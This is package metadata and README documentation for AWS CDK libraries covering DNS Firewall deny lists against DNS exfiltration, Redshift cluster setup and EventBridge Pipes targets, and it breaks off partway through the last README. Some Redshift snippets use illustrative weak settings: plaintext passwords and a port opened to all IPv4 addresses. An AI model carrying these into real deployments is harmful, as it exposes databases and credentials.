The CDK Construct Library for AWS::Route53Resolver
# Amazon Route53 Resolver Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> ## DNS Firewall With Route 53 Resolver DNS Firewall, you can filter and regulate outbound DNS traffic for your virtual private connections (VPCs). To do this, you create reusable collections of filtering rules in DNS Firewall rule groups and associate the rule groups to your VPC. DNS Firewall provides protection for outbound DNS requests from your VPCs. These requests route through Resolver for domain name resolution. A primary use of DNS Firewall protections is to help prevent DNS exfiltration of your data. DNS exfiltration can happen when a bad actor compromises an application instance in your VPC and then uses DNS lookup to send data out of the VPC to a domain that they control. With DNS Firewall, you can monitor and control the domains that your applications can query. You can deny access to the domains that you know to be bad and allow all other queries to pass through. Alternately, you can deny access to all domains except for the ones that you explicitly trust. ### Domain lists Domain lists can be created using a list of strings, a text file stored in Amazon S3 or a local text file: ```python block_list = route53resolver.FirewallDomainList(self, "BlockList", domains=route53resolver.FirewallDomains.from_list(["bad-domain.com", "bot-domain.net"]) ) s3_list = route53resolver.FirewallDomainList(self, "S3List", domains=route53resolver.FirewallDomains.from_s3_url("s3://bucket/prefix/object") ) asset_list = route53resolver.FirewallDomainList(self, "AssetList", domains=route53resolver.FirewallDomains.from_asset("/path/to/domains.txt") ) ``` The file must be a text file and must contain a single domain per line. Use `FirewallDomainList.fromFirewallDomainListId()` to import an existing or [AWS managed domain list](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver-dns-firewall-managed-domain-lists.html): ```python # AWSManagedDomainsMalwareDomainList in us-east-1 malware_list = route53resolver.FirewallDomainList.from_firewall_domain_list_id(self, "Malware", "rslvr-fdl-2c46f2ecbfec4dcc") ``` ### Rule group Create a rule group: ```python # my_block_list: route53resolver.FirewallDomainList route53resolver.FirewallRuleGroup(self, "RuleGroup", rules=[route53resolver.FirewallRule( priority=10, firewall_domain_list=my_block_list, # block and reply with NODATA action=route53resolver.FirewallRuleAction.block() ) ] ) ``` Rules can be added at construction time or using `addRule()`: ```python # my_block_list: route53resolver.FirewallDomainList # rule_group: route53resolver.FirewallRuleGroup rule_group.add_rule( priority=10, firewall_domain_list=my_block_list, # block and reply with NXDOMAIN action=route53resolver.FirewallRuleAction.block(route53resolver.DnsBlockResponse.nx_domain()) ) rule_group.add_rule( priority=20, firewall_domain_list=my_block_list, # block and override DNS response with a custom domain action=route53resolver.FirewallRuleAction.block(route53resolver.DnsBlockResponse.override("amazon.com")) ) ``` Use `associate()` to associate a rule group with a VPC: ```python import aws_cdk.aws_ec2 as ec2 # rule_group: route53resolver.FirewallRuleGroup # my_vpc: ec2.Vpc rule_group.associate("Association", priority=101, vpc=my_vpc ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:17.788138
aws_cdk_aws_route53resolver_alpha-2.239.0a0.tar.gz
76,828
43/42/625092a18f5607ae61793da24b6044471a8d63501306386a5007ba534597/aws_cdk_aws_route53resolver_alpha-2.239.0a0.tar.gz
source
sdist
null
false
cadf56c50d0ccdc636e8d33b42409477
628c2a5b207a1dc4c4342f64bc117aca700b9a2fad48a1efeb6c5293cfa4320f
4342625092a18f5607ae61793da24b6044471a8d63501306386a5007ba534597
null
[]
0
2.1
aws-cdk.aws-redshift-alpha
2.239.0a0
The CDK Construct Library for AWS::Redshift
# Amazon Redshift Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> ## Starting a Redshift Cluster Database To set up a Redshift cluster, define a `Cluster`. It will be launched in a VPC. You can specify a VPC, otherwise one will be created. The nodes are always launched in private subnets and are encrypted by default. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 vpc = ec2.Vpc(self, "Vpc") cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc ) ``` By default, the master password will be generated and stored in AWS Secrets Manager. You can specify characters to not include in generated passwords by setting `excludeCharacters` property. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 vpc = ec2.Vpc(self, "Vpc") cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin", exclude_characters="\"@/\\ '`" ), vpc=vpc ) ``` A default database named `default_db` will be created in the cluster. To change the name of this database set the `defaultDatabaseName` attribute in the constructor properties. By default, the cluster will not be publicly accessible. Depending on your use case, you can make the cluster publicly accessible with the `publiclyAccessible` property. By default, the node type is `RA3_LARGE`. You can specify a different node type by setting the `nodeType` property. ```python # Example automatically generated from non-compiling source. May contain errors. from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 # vpc: ec2.IVpc cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, node_type=NodeType.RA3_XLPLUS ) ``` ## Adding a logging bucket for database audit logging to S3 Amazon Redshift logs information about connections and user activities in your database. These logs help you to monitor the database for security and troubleshooting purposes, a process called database auditing. To send these logs to an S3 bucket, specify the `loggingProperties` when creating a new cluster. ```python from aws_cdk.aws_redshift_alpha import Login, LoggingProperties import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_s3 as s3 vpc = ec2.Vpc(self, "Vpc") bucket = s3.Bucket.from_bucket_name(self, "bucket", "amzn-s3-demo-bucket") cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, logging_properties=LoggingProperties( logging_bucket=bucket, logging_key_prefix="prefix" ) ) ``` ## Availability Zone Relocation By using [relocation in Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/mgmt/managing-cluster-recovery.html), you allow Amazon Redshift to move a cluster to another Availability Zone (AZ) without any loss of data or changes to your applications. This feature can be applied to both new and existing clusters. To enable this feature, set the `availabilityZoneRelocation` property to `true`. ```python # Example automatically generated from non-compiling source. May contain errors. from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 # vpc: ec2.IVpc cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, node_type=NodeType.RA3_XLPLUS, availability_zone_relocation=True ) ``` **Note**: The `availabilityZoneRelocation` property is only available for RA3 node types. ## Connecting To control who can access the cluster, use the `.connections` attribute. Redshift Clusters have a default port, so you don't need to specify the port: ```python cluster.connections.allow_default_port_from_any_ipv4("Open to the world") ``` The endpoint to access your database cluster will be available as the `.clusterEndpoint` attribute: ```python cluster.cluster_endpoint.socket_address ``` ## Database Resources This module allows for the creation of non-CloudFormation database resources such as users and tables. This allows you to manage identities, permissions, and stateful resources within your Redshift cluster from your CDK application. Because these resources are not available in CloudFormation, this library leverages [custom resources](https://docs.aws.amazon.com/cdk/api/latest/docs/custom-resources-readme.html) to manage them. In addition to the IAM permissions required to make Redshift service calls, the execution role for the custom resource handler requires database credentials to create resources within the cluster. These database credentials can be supplied explicitly through the `adminUser` properties of the various database resource constructs. Alternatively, the credentials can be automatically pulled from the Redshift cluster's default administrator credentials. However, this option is only available if the password for the credentials was generated by the CDK application (ie., no value vas provided for [the `masterPassword` property](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-redshift.Login.html#masterpasswordspan-classapi-icon-api-icon-experimental-titlethis-api-element-is-experimental-it-may-change-without-noticespan) of [`Cluster.masterUser`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-redshift.Cluster.html#masteruserspan-classapi-icon-api-icon-experimental-titlethis-api-element-is-experimental-it-may-change-without-noticespan)). ### Creating Users Create a user within a Redshift cluster database by instantiating a `User` construct. This will generate a username and password, store the credentials in a [AWS Secrets Manager `Secret`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-secretsmanager.Secret.html), and make a query to the Redshift cluster to create a new database user with the credentials. ```python User(self, "User", cluster=cluster, database_name="databaseName" ) ``` By default, the user credentials are encrypted with your AWS account's default Secrets Manager encryption key. You can specify the encryption key used for this purpose by supplying a key in the `encryptionKey` property. ```python import aws_cdk.aws_kms as kms encryption_key = kms.Key(self, "Key") User(self, "User", encryption_key=encryption_key, cluster=cluster, database_name="databaseName" ) ``` By default, a username is automatically generated from the user construct ID and its path in the construct tree. You can specify a particular username by providing a value for the `username` property. Usernames must be valid identifiers; see: [Names and identifiers](https://docs.aws.amazon.com/redshift/latest/dg/r_names.html) in the *Amazon Redshift Database Developer Guide*. ```python User(self, "User", username="myuser", cluster=cluster, database_name="databaseName" ) ``` The user password is generated by AWS Secrets Manager using the default configuration found in [`secretsmanager.SecretStringGenerator`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-secretsmanager.SecretStringGenerator.html), except with password length `30` and some SQL-incompliant characters excluded. The plaintext for the password will never be present in the CDK application; instead, a [CloudFormation Dynamic Reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/dynamic-references.html) will be used wherever the password value is required. You can specify characters to not include in generated passwords by setting `excludeCharacters` property. ```python User(self, "User", cluster=cluster, database_name="databaseName", exclude_characters="\"@/\\ '`" ) ``` ### Creating Tables Create a table within a Redshift cluster database by instantiating a `Table` construct. This will make a query to the Redshift cluster to create a new database table with the supplied schema. ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name="databaseName" ) ``` Tables greater than v2.114.1 can have their table name changed, for versions <= v2.114.1, this would not be possible. Therefore, changing of table names for <= v2.114.1 have been disabled. ```python # Example automatically generated from non-compiling source. May contain errors. from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_name="oldTableName", # This value can be change for versions greater than v2.114.1 table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name="databaseName" ) ``` The table can be configured to have distStyle attribute and a distKey column: ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)", dist_key=True), Column(name="col2", data_type="float") ], cluster=cluster, database_name="databaseName", dist_style=TableDistStyle.KEY ) ``` The table can also be configured to have sortStyle attribute and sortKey columns: ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)", sort_key=True), Column(name="col2", data_type="float", sort_key=True) ], cluster=cluster, database_name="databaseName", sort_style=TableSortStyle.COMPOUND ) ``` Tables and their respective columns can be configured to contain comments: ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)", comment="This is a column comment"), Column(name="col2", data_type="float", comment="This is a another column comment") ], cluster=cluster, database_name="databaseName", table_comment="This is a table comment" ) ``` Table columns can be configured to use a specific compression encoding: ```python from aws_cdk.aws_redshift_alpha import Column, Column from aws_cdk.aws_redshift_alpha import ColumnEncoding Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)", encoding=ColumnEncoding.TEXT32K), Column(name="col2", data_type="float", encoding=ColumnEncoding.DELTA32K) ], cluster=cluster, database_name="databaseName" ) ``` Table columns can also contain an `id` attribute, which can allow table columns to be renamed. **NOTE** To use the `id` attribute, you must also enable the `@aws-cdk/aws-redshift:columnId` feature flag. ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(id="col1", name="col1", data_type="varchar(4)"), Column(id="col2", name="col2", data_type="float") ], cluster=cluster, database_name="databaseName" ) ``` Query execution duration is limited to 1 minute by default. You can change this by setting the `timeout` property. Valid timeout values are between 1 seconds and 15 minutes. ```python from aws_cdk.aws_redshift_alpha import Column, Column from aws_cdk import Duration Table(self, "Table", table_columns=[Column(id="col1", name="col1", data_type="varchar(4)"), Column(id="col2", name="col2", data_type="float") ], cluster=cluster, database_name="databaseName", timeout=Duration.minutes(15) ) ``` ### Granting Privileges You can give a user privileges to perform certain actions on a table by using the `Table.grant()` method. ```python from aws_cdk.aws_redshift_alpha import Column, Column user = User(self, "User", cluster=cluster, database_name="databaseName" ) table = Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name="databaseName" ) table.grant(user, TableAction.DROP, TableAction.SELECT) ``` Take care when managing privileges via the CDK, as attempting to manage a user's privileges on the same table in multiple CDK applications could lead to accidentally overriding these permissions. Consider the following two CDK applications which both refer to the same user and table. In application 1, the resources are created and the user is given `INSERT` permissions on the table: ```python from aws_cdk.aws_redshift_alpha import Column, Column database_name = "databaseName" username = "myuser" table_name = "mytable" user = User(self, "User", username=username, cluster=cluster, database_name=database_name ) table = Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name=database_name ) table.grant(user, TableAction.INSERT) ``` In application 2, the resources are imported and the user is given `INSERT` permissions on the table: ```python from aws_cdk.aws_redshift_alpha import Column, Column database_name = "databaseName" username = "myuser" table_name = "mytable" user = User.from_user_attributes(self, "User", username=username, password=SecretValue.unsafe_plain_text("NOT_FOR_PRODUCTION"), cluster=cluster, database_name=database_name ) table = Table.from_table_attributes(self, "Table", table_name=table_name, table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name="databaseName" ) table.grant(user, TableAction.INSERT) ``` Both applications attempt to grant the user the appropriate privilege on the table by submitting a `GRANT USER` SQL query to the Redshift cluster. Note that the latter of these two calls will have no effect since the user has already been granted the privilege. Now, if application 1 were to remove the call to `grant`, a `REVOKE USER` SQL query is submitted to the Redshift cluster. In general, application 1 does not know that application 2 has also granted this permission and thus cannot decide not to issue the revocation. This leads to the undesirable state where application 2 still contains the call to `grant` but the user does not have the specified permission. Note that this does not occur when duplicate privileges are granted within the same application, as such privileges are de-duplicated before any SQL query is submitted. ## Rotating credentials When the master password is generated and stored in AWS Secrets Manager, it can be rotated automatically: ```python cluster.add_rotation_single_user() ``` The multi user rotation scheme is also available: ```python user = User(self, "User", cluster=cluster, database_name="databaseName" ) cluster.add_rotation_multi_user("MultiUserRotation", secret=user.secret ) ``` ## Adding Parameters You can add a parameter to a parameter group with`ClusterParameterGroup.addParameter()`. ```python from aws_cdk.aws_redshift_alpha import ClusterParameterGroup params = ClusterParameterGroup(self, "Params", description="desc", parameters={ "require_ssl": "true" } ) params.add_parameter("enable_user_activity_logging", "true") ``` Additionally, you can add a parameter to the cluster's associated parameter group with `Cluster.addToParameterGroup()`. If the cluster does not have an associated parameter group, a new parameter group is created. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk as cdk # vpc: ec2.Vpc cluster = Cluster(self, "Cluster", master_user=Login( master_username="admin", master_password=cdk.SecretValue.unsafe_plain_text("tooshort") ), vpc=vpc ) cluster.add_to_parameter_group("enable_user_activity_logging", "true") ``` ## Rebooting for Parameter Updates In most cases, existing clusters [must be manually rebooted](https://docs.aws.amazon.com/redshift/latest/mgmt/working-with-parameter-groups.html) to apply parameter changes. You can automate parameter related reboots by setting the cluster's `rebootForParameterChanges` property to `true` , or by using `Cluster.enableRebootForParameterChanges()`. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk as cdk # vpc: ec2.Vpc cluster = Cluster(self, "Cluster", master_user=Login( master_username="admin", master_password=cdk.SecretValue.unsafe_plain_text("tooshort") ), vpc=vpc ) cluster.add_to_parameter_group("enable_user_activity_logging", "true") cluster.enable_reboot_for_parameter_changes() ``` ## Resource Action You can perform various actions on the Redshift resource by specifying the `resourceAction` property, including [pausing and resuming the cluster](https://docs.aws.amazon.com/redshift/latest/mgmt/rs-mgmt-pause-resume-cluster.html), as well as initiating [failover for Multi-AZ clusters](https://docs.aws.amazon.com/redshift/latest/mgmt/test-cluster-multi-az.html). ```python # Example automatically generated from non-compiling source. May contain errors. from aws_cdk.aws_redshift_alpha import Login, Login, Login import aws_cdk.aws_ec2 as ec2 from aws_cdk.aws_redshift_alpha import ResourceAction # vpc: ec2.IVpc # Pause the cluster Cluster(self, "PausedCluster", master_user=Login( master_username="admin" ), vpc=vpc, resource_action=ResourceAction.PAUSE ) # Resume the cluster Cluster(self, "ResumedCluster", master_user=Login( master_username="admin" ), vpc=vpc, resource_action=ResourceAction.RESUME ) # Failover the cluster Cluster(self, "FailOverCluster", master_user=Login( master_username="admin" ), # VPC must have 3 AZs for the cluster which executes failover action vpc=vpc, # Must be a multi-AZ cluster to failover multi_az=True, resource_action=ResourceAction.FAILOVER_PRIMARY_COMPUTE ) ``` ## Elastic IP If you configure your cluster to be publicly accessible, you can optionally select an *elastic IP address* to use for the external IP address. An elastic IP address is a static IP address that is associated with your AWS account. You can use an elastic IP address to connect to your cluster from outside the VPC. An elastic IP address gives you the ability to change your underlying configuration without affecting the IP address that clients use to connect to your cluster. This approach can be helpful for situations such as recovery after a failure. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk as cdk # vpc: ec2.Vpc Cluster(self, "Redshift", master_user=Login( master_username="admin", master_password=cdk.SecretValue.unsafe_plain_text("tooshort") ), vpc=vpc, publicly_accessible=True, elastic_ip="10.123.123.255" ) ``` If the Cluster is in a VPC and you want to connect to it using the private IP address from within the cluster, it is important to enable *DNS resolution* and *DNS hostnames* in the VPC config. If these parameters would not be set, connections from within the VPC would connect to the elastic IP address and not the private IP address. ```python import aws_cdk.aws_ec2 as ec2 vpc = ec2.Vpc(self, "VPC", enable_dns_support=True, enable_dns_hostnames=True ) ``` Note that if there is already an existing, public accessible Cluster, which VPC configuration is changed to use *DNS hostnames* and *DNS resolution*, connections still use the elastic IP address until the cluster is resized. ### Elastic IP vs. Cluster node public IP The elastic IP address is an external IP address for accessing the cluster outside of a VPC. It's not related to the cluster node public IP addresses and private IP addresses that are accessible via the `clusterEndpoint` property. The public and private cluster node IP addresses appear regardless of whether the cluster is publicly accessible or not. They are used only in certain circumstances to configure ingress rules on the remote host. These circumstances occur when you load data from an Amazon EC2 instance or other remote host using a Secure Shell (SSH) connection. ### Attach Elastic IP after Cluster creation In some cases, you might want to associate the cluster with an elastic IP address or change an elastic IP address that is associated with the cluster. To attach an elastic IP address after the cluster is created, first update the cluster so that it is not publicly accessible, then make it both publicly accessible and add an Elastic IP address in the same operation. ## Enhanced VPC Routing When you use Amazon Redshift enhanced VPC routing, Amazon Redshift forces all COPY and UNLOAD traffic between your cluster and your data repositories through your virtual private cloud (VPC) based on the Amazon VPC service. By using enhanced VPC routing, you can use standard VPC features, such as VPC security groups, network access control lists (ACLs), VPC endpoints, VPC endpoint policies, internet gateways, and Domain Name System (DNS) servers, as described in the Amazon VPC User Guide. You use these features to tightly manage the flow of data between your Amazon Redshift cluster and other resources. When you use enhanced VPC routing to route traffic through your VPC, you can also use VPC flow logs to monitor COPY and UNLOAD traffic. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk as cdk # vpc: ec2.Vpc Cluster(self, "Redshift", master_user=Login( master_username="admin", master_password=cdk.SecretValue.unsafe_plain_text("tooshort") ), vpc=vpc, enhanced_vpc_routing=True ) ``` If enhanced VPC routing is not enabled, Amazon Redshift routes traffic through the internet, including traffic to other services within the AWS network. ## Default IAM role Some Amazon Redshift features require Amazon Redshift to access other AWS services on your behalf. For your Amazon Redshift clusters to act on your behalf, you supply security credentials to your clusters. The preferred method to supply security credentials is to specify an AWS Identity and Access Management (IAM) role. When you create an IAM role and set it as the default for the cluster using console, you don't have to provide the IAM role's Amazon Resource Name (ARN) to perform authentication and authorization. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_iam as iam # vpc: ec2.Vpc default_role = iam.Role(self, "DefaultRole", assumed_by=iam.ServicePrincipal("redshift.amazonaws.com") ) Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, roles=[default_role], default_role=default_role ) ``` A default role can also be added to a cluster using the `addDefaultIamRole` method. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_iam as iam # vpc: ec2.Vpc default_role = iam.Role(self, "DefaultRole", assumed_by=iam.ServicePrincipal("redshift.amazonaws.com") ) redshift_cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, roles=[default_role] ) redshift_cluster.add_default_iam_role(default_role) ``` ## IAM roles Attaching IAM roles to a Redshift Cluster grants permissions to the Redshift service to perform actions on your behalf. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_iam as iam # vpc: ec2.Vpc role = iam.Role(self, "Role", assumed_by=iam.ServicePrincipal("redshift.amazonaws.com") ) cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, roles=[role] ) ``` Additional IAM roles can be attached to a cluster using the `addIamRole` method. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_iam as iam # vpc: ec2.Vpc role = iam.Role(self, "Role", assumed_by=iam.ServicePrincipal("redshift.amazonaws.com") ) cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc ) cluster.add_iam_role(role) ``` ## Multi-AZ Amazon Redshift supports [multiple Availability Zones (Multi-AZ) deployments]((https://docs.aws.amazon.com/redshift/latest/mgmt/managing-cluster-multi-az.html)) for provisioned RA3 clusters. By using Multi-AZ deployments, your Amazon Redshift data warehouse can continue operating in failure scenarios when an unexpected event happens in an Availability Zone. To create a Multi-AZ cluster, set the `multiAz` property to `true` when creating the cluster. ```python # Example automatically generated from non-compiling source. May contain errors. # vpc: ec2.IVpc redshift.Cluster(stack, "Cluster", master_user={ "master_username": "admin" }, vpc=vpc, # 3 AZs are required for Multi-AZ node_type=redshift.NodeType.RA3_XLPLUS, # must be RA3 node type cluster_type=redshift.ClusterType.MULTI_NODE, # must be MULTI_NODE number_of_nodes=2, # must be 2 or more multi_az=True ) ``` ## Resizing As your data warehousing needs change, it's possible to resize your Redshift cluster. If the cluster was deployed via CDK, it's important to resize it via CDK so the change is registered in the AWS CloudFormation template. There are two types of resize operations: * Elastic resize - Number of nodes and node type can be changed, but not at the same time. Elastic resize is the default behavior, as it's a fast operation and typically completes in minutes. Elastic resize is only supported on clusters of the following types: * dc1.large (if your cluster is in a VPC) * dc1.8xlarge (if your cluster is in a VPC) * dc2.large * dc2.8xlarge * ds2.xlarge * ds2.8xlarge * ra3.large * ra3.xlplus * ra3.4xlarge * ra3.16xlarge * Classic resize - Number of nodes, node type, or both, can be changed. This operation takes longer to complete, but is useful when the resize operation doesn't meet the criteria of an elastic resize. If you prefer classic resizing, you can set the `classicResizing` flag when creating the cluster. There are other constraints to be aware of, for example, elastic resizing does not support single-node clusters and there are limits on the number of nodes you can add to a cluster. See the [AWS Redshift Documentation](https://docs.aws.amazon.com/redshift/latest/mgmt/managing-cluster-operations.html#rs-resize-tutorial) and [AWS API Documentation](https://docs.aws.amazon.com/redshift/latest/APIReference/API_ResizeCluster.html) for more details. ## Maintenance track name When Amazon Redshift releases a new cluster version, your cluster is updated during its maintenance window. You can control whether your cluster is updated to the most recent approved release or to the previous release. See the [AWS Redshift Documentation](https://docs.aws.amazon.com/redshift/latest/mgmt/managing-cluster-considerations.html#rs-mgmt-maintenance-tracks) for more details. To control which cluster version is applied during a maintenance window, set the `maintenanceTrackName` property for the cluster. ```python # Example automatically generated from non-compiling source. May contain errors. redshift.Cluster(stack, "Cluster", master_user={ "master_username": "admin" }, vpc=vpc, maintenance_track_name=redshift.MaintenanceTrackName.CURRENT ) ``` You can specify one of the following `MaintenanceTrackName` values: * `CURRENT`: Use the most current approved cluster version. * `TRAILING`: Use the cluster version before the current version.
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:16.787789
aws_cdk_aws_redshift_alpha-2.239.0a0.tar.gz
222,203
07/76/0990f86720813d283cb39b7447b535d831633d8238c2ac5baa4f7d7b63a1/aws_cdk_aws_redshift_alpha-2.239.0a0.tar.gz
source
sdist
null
false
11839702f92cbb0dac878755a768af28
1ad2f0109106dc29c3acb68cc68c274e890cb652011b5b667253f2a1e26e3b9e
07760990f86720813d283cb39b7447b535d831633d8238c2ac5baa4f7d7b63a1
null
[]
0
2.1
aws-cdk.aws-pipes-targets-alpha
2.239.0a0
The CDK Construct Library for Amazon EventBridge Pipes Targets
# Amazon EventBridge Pipes Targets Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> EventBridge Pipes Targets let you create a target for an EventBridge Pipe. For more details see the [service documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-target.html). ## Targets Pipe targets are the end point of an EventBridge Pipe. The following targets are supported: * `targets.ApiDestinationTarget`: [Send event source to an EventBridge API destination](#amazon-eventbridge-api-destination) * `targets.ApiGatewayTarget`: [Send event source to an API Gateway REST API](#amazon-api-gateway-rest-api) * `targets.CloudWatchLogsTarget`: [Send event source to a CloudWatch Logs log group](#amazon-cloudwatch-logs-log-group) * `targets.EventBridgeTarget`: [Send event source to an EventBridge event bus](#amazon-eventbridge-event-bus) * `targets.FirehoseTarget`: [Send event source to an Amazon Data Firehose delivery stream](#amazon-data-firehose-delivery-stream) * `targets.KinesisTarget`: [Send event source to a Kinesis data stream](#amazon-kinesis-data-stream) * `targets.LambdaFunction`: [Send event source to a Lambda function](#aws-lambda-function) * `targets.SageMakerTarget`: [Send event source to a SageMaker pipeline](#amazon-sagemaker-pipeline) * `targets.SfnStateMachine`: [Invoke a Step Functions state machine from an event source](#aws-step-functions-state-machine) * `targets.SnsTarget`: [Send event source to an SNS topic](#amazon-sns-topic) * `targets.SqsTarget`: [Send event source to an SQS queue](#amazon-sqs-queue) ### Amazon EventBridge API Destination An EventBridge API destination can be used as a target for a pipe. The API destination will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # dest: events.ApiDestination api_target = targets.ApiDestinationTarget(dest) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=api_target ) ``` The input to the target API destination can be transformed: ```python # source_queue: sqs.Queue # dest: events.ApiDestination api_target = targets.ApiDestinationTarget(dest, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=api_target ) ``` ### Amazon API Gateway Rest API A REST API can be used as a target for a pipe. The REST API will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue fn = lambda_.Function(self, "MyFunc", handler="index.handler", runtime=lambda_.Runtime.NODEJS_LATEST, code=lambda_.Code.from_inline("exports.handler = e => {}") ) rest_api = api.LambdaRestApi(self, "MyRestAPI", handler=fn) api_target = targets.ApiGatewayTarget(rest_api) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=api_target ) ``` The input to the target REST API can be transformed: ```python # source_queue: sqs.Queue fn = lambda_.Function(self, "MyFunc", handler="index.handler", runtime=lambda_.Runtime.NODEJS_LATEST, code=lambda_.Code.from_inline("exports.handler = e => {}") ) rest_api = api.LambdaRestApi(self, "MyRestAPI", handler=fn) api_target = targets.ApiGatewayTarget(rest_api, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=api_target ) ``` ### Amazon CloudWatch Logs Log Group A CloudWatch Logs log group can be used as a target for a pipe. The log group will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_log_group: logs.LogGroup log_group_target = targets.CloudWatchLogsTarget(target_log_group) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), 